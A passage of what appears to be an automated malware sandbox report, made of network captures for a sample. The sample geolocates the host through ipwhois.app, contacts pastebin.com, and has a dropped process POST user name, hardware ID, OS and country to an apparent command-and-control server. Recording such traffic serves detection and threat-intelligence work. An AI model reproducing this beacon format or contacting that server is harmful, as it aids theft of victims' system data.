                           Jun 25, 2024 14:56:00.405054092 CEST | 443         | 49749     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:00.405208111 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.405591965 CEST | 49749       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.406380892 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.406413078 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:00.406703949 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.406832933 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:00.406847000 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.075680971 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.077016115 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.077043056 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.411300898 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.411412954 CEST | 443         | 49750     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.411510944 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.412157059 CEST | 49750       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.413146019 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.413192034 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:01.413264990 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.413471937 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:01.413486004 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.079979897 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.081149101 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.081176996 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.418127060 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.418232918 CEST | 443         | 49751     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.418333054 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.421781063 CEST | 49751       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.424602985 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.424623966 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:02.425116062 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.432285070 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:02.432295084 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.089972019 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.091456890 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.091473103 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.420692921 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.420783043 CEST | 443         | 49752     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.420835972 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.421591997 CEST | 49752       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.422733068 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.422772884 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:03.422843933 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.423111916 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:03.423125029 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:04.066106081 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:04.067651987 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:04.067686081 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:04.391880989 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:04.391977072 CEST | 443         | 49753     | 195.201.57.90 | 192.168.2.4
                           Jun 25, 2024 14:56:04.392045975 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:04.392939091 CEST | 49753       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:04.393908024 CEST | 49754       | 443       | 192.168.2.4   | 195.201.57.90
                           Jun 25, 2024 14:56:04.393933058 CEST | 443         | 49754     | 195.201.57.90 | 192.168.2.4
                          Jun 25, 2024 14:56:04.394103050 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.394524097 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.394536018 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.062500000 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.063877106 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:05.063900948 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395412922 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395513058 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395610094 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:05.404007912 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:21.919306040 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.919347048 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:21.919447899 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.949754953 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.949783087 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.409884930 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.410017014 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.430248022 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.430270910 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.430619001 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.440834999 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.488496065 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942024946 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942161083 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942222118 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.947494984 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:23.549159050 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.554735899 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:23.555691957 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.555915117 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.563924074 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195254087 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195297956 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195384979 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.220315933 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.225420952 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.225503922 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.225759029 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.230700970 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.593317986 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.598547935 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.598604918 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.720172882 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.725250959 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.765176058 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.770004988 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.770077944 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.774928093 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:25.619870901 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:25.620069981 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:25.690557957 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:25.695507050 CEST8049759172.86.105.109192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jun 25, 2024 14:55:41.372880936 CEST | 63693 | 53 | 192.168.2.4 | 1.1.1.1
                          Jun 25, 2024 14:55:41.397761106 CEST | 53 | 63693 | 1.1.1.1 | 192.168.2.4
                          Jun 25, 2024 14:56:21.904125929 CEST | 51384 | 53 | 192.168.2.4 | 1.1.1.1
                          Jun 25, 2024 14:56:21.911163092 CEST | 53 | 51384 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jun 25, 2024 14:55:41.372880936 CEST | 192.168.2.4 | 1.1.1.1 | 0xac29 | Standard query (0) | ipwhois.app | A (IP address) | IN (0x0001) | false
                          Jun 25, 2024 14:56:21.904125929 CEST | 192.168.2.4 | 1.1.1.1 | 0xb2bd | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jun 25, 2024 14:55:41.397761106 CEST | 1.1.1.1 | 192.168.2.4 | 0xac29 | No error (0) | ipwhois.app |  | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                          Jun 25, 2024 14:56:21.911163092 CEST | 1.1.1.1 | 192.168.2.4 | 0xb2bd | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
                          Jun 25, 2024 14:56:21.911163092 CEST | 1.1.1.1 | 192.168.2.4 | 0xb2bd | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                          Jun 25, 2024 14:56:21.911163092 CEST | 1.1.1.1 | 192.168.2.4 | 0xb2bd | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
                          • ipwhois.app
                          • pastebin.com
                          • 172.86.105.109
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49757 | 195.201.57.90 | 80 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jun 25, 2024 14:56:23.555915117 CEST | 65 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          Connection: Keep-Alive
                          Jun 25, 2024 14:56:24.195254087 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:24 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67 3e 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 77 68 6f 69 73 2e 69 6f 2f 66 6c 61 67 73 2f 75 73 2e 73 76 67 3c 2f 63 6f 75 6e 74 72 79 5f 66 6c 61 67 3e 3c 63 6f 75 6e 74 72 79 5f 63 61 70 69 74 61 6c 3e 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e [TRUNCATED]
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag>https://cdn.ipwhois.io/flags/us.svg</country_flag><country_capital>Washington D.C.</country_capital><country_phone>+1</country_phone><country_neighbours>CA,MX</country_neighbours><region>New York</region><city>New York</city><latitude>40.7127837</latitude><longitude>-74.0059413</longitude><asn>AS3356</asn><org>Centurylink Communications, LLC</org><isp>Level</isp><timezone>America/New_York</timezone><timezone_name>EDT</timezone_name><timezone_dstOffset>3600</timezone_dstOffset><timezone_gmtOffset>-14400</timezone_gmtOffset><timezone_gmt>-04:00</timezone_gmt><currency>US Dollar</currency><currency_code>USD</currency_code><currency_symbol>$</currency_symbol><currency_rates>1</currency_rates><currency_plural>US dollars</currency_p
                          Jun 25, 2024 14:56:24.195297956 CEST | 22 | IN | Data Raw: 6c 75 72 61 6c 3e 3c 2f 71 75 65 72 79 3e 0a 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: lural></query>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49759 | 172.86.105.109 | 80 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jun 25, 2024 14:56:24.225759029 CEST | 208 | OUT | POST /hook/upgrade.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary="b52924a5-c491-4bc6-982a-722aba884181"
                          Host: 172.86.105.109
                          Content-Length: 428
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Jun 25, 2024 14:56:24.720172882 CEST | 40 | OUT | Data Raw: 2d 2d 62 35 32 39 32 34 61 35 2d 63 34 39 31 2d 34 62 63 36 2d 39 38 32 61 2d 37 32 32 61 62 61 38 38 34 31 38 31 0d 0a
                          Data Ascii: --b52924a5-c491-4bc6-982a-722aba884181
                          Jun 25, 2024 14:56:24.765176058 CEST | 87 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 74 6f 6b 65
                          Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=token
                          Jun 25, 2024 14:56:24.770077944 CEST | 301 | OUT | Data Raw: 41 78 4d 58 44 6a 6f 3d 0d 0a 2d 2d 62 35 32 39 32 34 61 35 2d 63 34 39 31 2d 34 62 63 36 2d 39 38 32 61 2d 37 32 32 61 62 61 38 38 34 31 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65
                          Data Ascii: AxMXDjo=--b52924a5-c491-4bc6-982a-722aba884181Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=encryptedDataJnVzZXI9am9uZXMmaHdpZD1CRTJCNTdBMjA1N0Y2NThCNkEmb3M9MTAuMC4xOTA0NSZjb3VudHJ5PVVTJmJ1aWxkaWQ9VGVzdG


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49731 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:42 UTC | 65 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          Connection: Keep-Alive
                          2024-06-25 12:55:42 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:42 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49732 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:43 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:43 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:43 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:43 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 49733 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:44 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:45 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:44 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:45 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 49734 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:45 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:46 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:45 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:46 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.4 | 49735 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:46 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:47 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:47 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:47 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.4 | 49736 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:48 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:48 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
